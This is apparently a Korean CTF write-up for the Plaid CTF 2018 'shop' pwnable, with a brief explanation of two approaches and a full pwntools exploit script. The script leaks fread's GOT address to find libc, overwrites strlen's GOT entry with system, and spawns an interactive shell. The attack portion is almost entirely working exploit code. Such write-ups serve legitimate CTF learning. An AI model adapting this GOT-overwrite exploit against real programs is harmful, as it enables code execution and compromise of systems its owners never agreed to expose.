Write-up/Pwnable
[Plaid CTF 2018] shop python solve code 1
MyriaBreak
2018. 5. 22. 23:37
1. got영역에서 preItem 이 null이 되게하는 곳(Item갯수가 무려 35개가 되게할수가 있다.)
거기서부터 fread까지 덮어쓰고, fread다음에 있는 strlen의 값을 system함수의 주소로 덮어쓰는 코드
2. 이것말고 shopname을 주소를 bss영역으로 덮고 rename을 통해서
bss영역을 덮어쓰면서 다시 shopname주소를 memmem의 got값으로 덮어써서 memmem got의 값을 변경시키는 코드도 있다.
일단 전자.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 | #!/usr/bin/env python from pwn import * import string lib = ELF("/lib/x86_64-linux-gnu/libc.so.6") #lib = ELF("./libc.so.6") elf = ELF("./shop") conn = process("./shop") def AddItem(item, description="nothing", price="1"): conn.sendlineafter("> ","a") conn.sendline(item) conn.sendline(description) conn.sendline(price) def CheckoutAllItem(item_IDs): conn.sendline("c") conn.sendline(item_IDs) result = conn.recvuntil("TOTAL: $") total = conn.recvuntil(".") return (result, total[:-1]) def ListItem(): conn.sendlineafter("> ", "l") list = conn.recvuntil("> ") return list def RenameShop(name): conn.sendline("n") conn.sendlineafter('Enter your shop name:', name) def MakeALL_2byte_ItemIDs(k, n): """ de Bruijn sequence for alphabet k and subsequences of length n. https://en.wikipedia.org/wiki/De_Bruijn_sequence """ try: # let's see if k can be cast to an integer; # if so, make our alphabet a list _ = int(k) alphabet = list(map(str, range(k))) except (ValueError, TypeError): alphabet = k k = len(k) a = [0] * k * n sequence = [] def db(t, p): if t > n: if n % p == 0: sequence.extend(a[1:p + 1]) else: a[t] = a[t - p] db(t + 1, p) for j in range(a[t - p] + 1, k): a[t] = j db(t + 1, t) db(1, 1) return "".join(alphabet[i] for i in sequence) conn.sendlineafter('Enter your shop name:', "myria") for i in range(0,33): AddItem(str(i)) """ All_ItemIDs = MakeALL_2byte_ItemIDs("0123456789abcdef", 4) All_ItemIDs = All_ItemIDs[:65540] """ All_ItemIDs = cyclic(0x10000, alphabet='0123456789abcdef', n=4) result, total = CheckoutAllItem(All_ItemIDs) log.info("Checkout : %s" % total) ### fread leak! fread_got = elf.got["fread"] log.info("fread.got : 0x%x" % fread_got) RenameShop(p64(fread_got-44)) leak = ListItem().split("\n")[-2].split(" - ")[1] leak = leak+"\x00"*(8-len(leak)) fread_addr = u64(leak) fread_offset = lib.symbols['fread'] strlen_offset = lib.symbols['strlen'] printf_offset = lib.symbols['printf'] fgets_offset = lib.symbols['fgets'] memmem_offset = lib.symbols['memmem'] system_offset = lib.symbols['system'] base_addr = fread_addr - fread_offset strlen_addr = base_addr + strlen_offset printf_addr = base_addr + printf_offset fgets_addr = base_addr + fgets_offset memmem_addr = base_addr + memmem_offset system_addr = base_addr + 0x046590 log.info("%9s : 0x%x" % ("base_addr", base_addr)) log.info("%9s : 0x%x" % ("fread",fread_addr)) log.info("%9s : 0x%x" % ("strlen",strlen_addr)) log.info("%9s : 0x%x" % ("printf",printf_addr)) log.info("%9s : 0x%x" % ("fgets",fgets_addr)) log.info("%9s : 0x%x" % ("memmem",memmem_addr)) log.info("%9s : 0x%x" % ("system",system_addr)) print("") ### _preItem Null, RandomID leak pre_preItemIsNull_Item=0x602008 RenameShop(p64((pre_preItemIsNull_Item+8)-44)) leak = ListItem().split("\n")[-2].split(" - ")[1] leak = leak+"\x00"*(8-len(leak)) pre_preItemIsNull_Item_ID = u64(leak) log.info("preItemIsNull_Item+8(ID) : 0x%x" % pre_preItemIsNull_Item_ID) print("") #malloc RenameShop(p64(pre_preItemIsNull_Item)+"@@@@"+"A") LastItemID = p64(pre_preItemIsNull_Item_ID)[:4] result, total = CheckoutAllItem(All_ItemIDs[4:]+LastItemID) log.info("Checkout : %s" % total) print(result) exploit = "\x00"*(fread_got-pre_preItemIsNull_Item) exploit += p64(fread_addr) exploit += p64(system_addr) RenameShop(exploit) conn.sendline("sh;") conn.interactive() | cs |